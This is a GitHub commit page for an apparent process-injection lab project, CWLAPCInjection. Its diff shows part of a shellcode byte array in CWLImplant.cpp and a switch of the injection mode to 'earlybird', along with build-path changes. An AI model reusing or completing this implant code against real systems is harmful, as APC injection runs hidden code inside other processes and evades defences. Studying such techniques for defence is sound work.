Skip to content

Commit 365f763

Browse files
committed
updated
1 parent 57ffba7 commit 365f763

File tree

69 files changed

+22
-18
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

69 files changed

+22
-18
lines changed
4.5 KB
Binary file not shown.
-1.8 MB
Binary file not shown.
Binary file not shown.

CWLAPCInjection/CWLAPCInjection/CWLImplant.cpp

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -234,8 +234,8 @@ int main() {
234234
"\x31\xc9\x88\x4c\x24\x1b\x89\xe1\x31\xd2\x6a\x30\x53\x51\x52"
235235
"\xff\xd0\x31\xc0\x50\xff\x55\x08";
236236
#endif
237-
//wchar_t mode[] = L"earlybird";
238-
wchar_t mode[] = L"normal";
237+
wchar_t mode[] = L"earlybird";
238+
//wchar_t mode[] = L"normal";
239239
SIZE_T payloadSize = sizeof(buf);
240240
APCInjection(buf, payloadSize, mode);
241241
}

CWLAPCInjection/CWLAPCInjection/Debug/CWLAPCInjection.exe.recipe

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
<Project>
33
<ProjectOutputs>
44
<ProjectOutput>
5-
<FullPath>C:\Users\CWLabs\source\repos\CWLAPCInjection\Debug\CWLAPCInjection.exe</FullPath>
5+
<FullPath>C:\Users\CWLabs\Desktop\ProcessInjections\CWLAPCInjection\Debug\CWLAPCInjection.exe</FullPath>
66
</ProjectOutput>
77
</ProjectOutputs>
88
<ContentFiles />
168 Bytes
Binary file not shown.
Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,3 @@
11
 CWLImplant.cpp
2-
C:\Users\CWLabs\source\repos\CWLAPCInjection\CWLAPCInjection\CWLImplant.cpp(50,11): warning C4101: 'status': unreferenced local variable
3-
CWLAPCInjection.vcxproj -> C:\Users\CWLabs\source\repos\CWLAPCInjection\Debug\CWLAPCInjection.exe
2+
C:\Users\CWLabs\Desktop\ProcessInjections\CWLAPCInjection\CWLAPCInjection\CWLImplant.cpp(50,11): warning C4101: 'status': unreferenced local variable
3+
CWLAPCInjection.vcxproj -> C:\Users\CWLabs\Desktop\ProcessInjections\CWLAPCInjection\Debug\CWLAPCInjection.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.

0 commit comments

Comments
 (0)